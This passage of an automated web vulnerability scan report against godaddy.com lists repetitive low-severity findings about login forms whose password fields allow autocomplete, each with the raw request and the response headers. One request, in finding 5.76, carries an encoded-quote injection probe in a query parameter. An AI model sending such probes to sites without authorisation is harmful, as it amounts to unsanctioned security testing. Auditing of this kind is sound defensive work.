X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=wkiu3zqwrxhjhydmmzn115gb; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: SplitValue1=92; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:19 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smtwfos&shopper=&privatelabelid=1&isc=smtwfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=92; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=cdhhgbngubtfjakboflgccfcahodmdog; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=cdhhgbngubtfjakboflgccfcahodmdog; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:59:19 GMT; path=/
Date: Mon, 05 Mar 2012 01:59:18 GMT
Connection: close
Content-Length: 146383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smtwfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.68. http://www.godaddy.com/ssl/ssl-open-source.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-open-source.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ssl/ssl-open-source.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ko30ih42onxw50a1pisnuw4w; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ko30ih42onxw50a1pisnuw4w; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:13 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:13 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:13 GMT; path=/
Set-Cookie: SplitValue1=30; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:13 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-open-source.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=30; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:13 GMT
Connection: close
Content-Length: 95130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.69. http://www.godaddy.com/tlds/asia.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/asia.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/asia.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=dzsmpqdvoocpu0r1fcr54x0k; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=dzsmpqdvoocpu0r1fcr54x0k; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:32 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:32 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:32 GMT; path=/
Set-Cookie: SplitValue1=1; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:32 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/asia.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=1; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:32 GMT
Connection: close
Content-Length: 130284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.70. http://www.godaddy.com/tlds/biz.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/biz.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/biz.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=q4s5j00wyex1o0shneeftrrk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=q4s5j00wyex1o0shneeftrrk; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:26 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:26 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:26 GMT; path=/
Set-Cookie: SplitValue1=11; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:26 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/biz.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=11; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:25 GMT
Connection: close
Content-Length: 129708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.71. http://www.godaddy.com/tlds/ca.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/ca.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/ca.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ta2n0nt3ftfzkrbohq0x1jrq; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ta2n0nt3ftfzkrbohq0x1jrq; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:28 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:28 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:28 GMT; path=/
Set-Cookie: SplitValue1=95; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:28 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/ca.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=95; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:27 GMT
Connection: close
Content-Length: 128690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.72. http://www.godaddy.com/tlds/co-domain.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/co-domain.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/co-domain.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=4qyevd0n0btohuzk3oq4spum; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=4qyevd0n0btohuzk3oq4spum; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:21 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:21 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:21 GMT; path=/
Set-Cookie: SplitValue1=11; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:21 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/co-domain.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=11; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:20 GMT
Connection: close
Content-Length: 136432


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.73. http://www.godaddy.com/tlds/co-domain.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/co-domain.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/co-domain.aspx?isc=gppt02C036&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=3u22z5qwafryiztk0fpcvosa; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=3u22z5qwafryiztk0fpcvosa; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:22 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:22 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:22 GMT; path=/
Set-Cookie: SplitValue1=21; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:22 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/co-domain.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=gppt02C036&domain=edhardy.com&shopper=&privatelabelid=1&isc=gppt02C036&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=21; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:21 GMT
Connection: close
Content-Length: 139654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gppt02C036&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.74. http://www.godaddy.com/tlds/com.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/com.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/com.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=v4b4tqaqas41esi0gm4sofyv; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=v4b4tqaqas41esi0gm4sofyv; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:20 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:20 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/com.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:20 GMT
Connection: close
Content-Length: 132023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.75. http://www.godaddy.com/tlds/info.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/info.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/info.aspx?tld=info&ci=16860 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=wa4cz3zgcty3pkvdhyv30z4j; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=wa4cz3zgcty3pkvdhyv30z4j; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:23 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:23 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:23 GMT; path=/
Set-Cookie: SplitValue1=5; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:23 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/info.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=tld=info&ci=16860&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=5; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:22 GMT
Connection: close
Content-Length: 130499


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.76. http://www.godaddy.com/tlds/international-domain-names.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/international-domain-names.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/international-domain-names.aspx?tld=cc&ci=41914\u0027 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kvswids4omazeh1p3vllhrg3; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kvswids4omazeh1p3vllhrg3; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:29 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:29 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:29 GMT; path=/
Set-Cookie: SplitValue1=6; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:29 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/international-domain-names.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=tld=cc&ci=41914%5cu0027&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=6; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:29 GMT
Connection: close
Content-Length: 157939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.77. http://www.godaddy.com/tlds/me.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/me.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/me.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=k1p0i2c1nwnupaggi21541aq; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=k1p0i2c1nwnupaggi21541aq; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:29 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:29 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:29 GMT; path=/
Set-Cookie: SplitValue1=94; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:29 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/me.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=94; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:28 GMT
Connection: close
Content-Length: 126495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.78. http://www.godaddy.com/tlds/mobi.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/mobi.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /tlds/mobi.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=j252txn2slf2x5jqxzv2431m; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=j252txn2slf2x5jqxzv2431m; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:26 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:26 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:26 GMT; path=/
Set-Cookie: SplitValue1=9; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:26 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/tlds/mobi.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=9; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:26 GMT
Connection: close
Content-Length: 136068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.79. http://www.godaddy.com/tlds/net.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /tlds/net.aspx

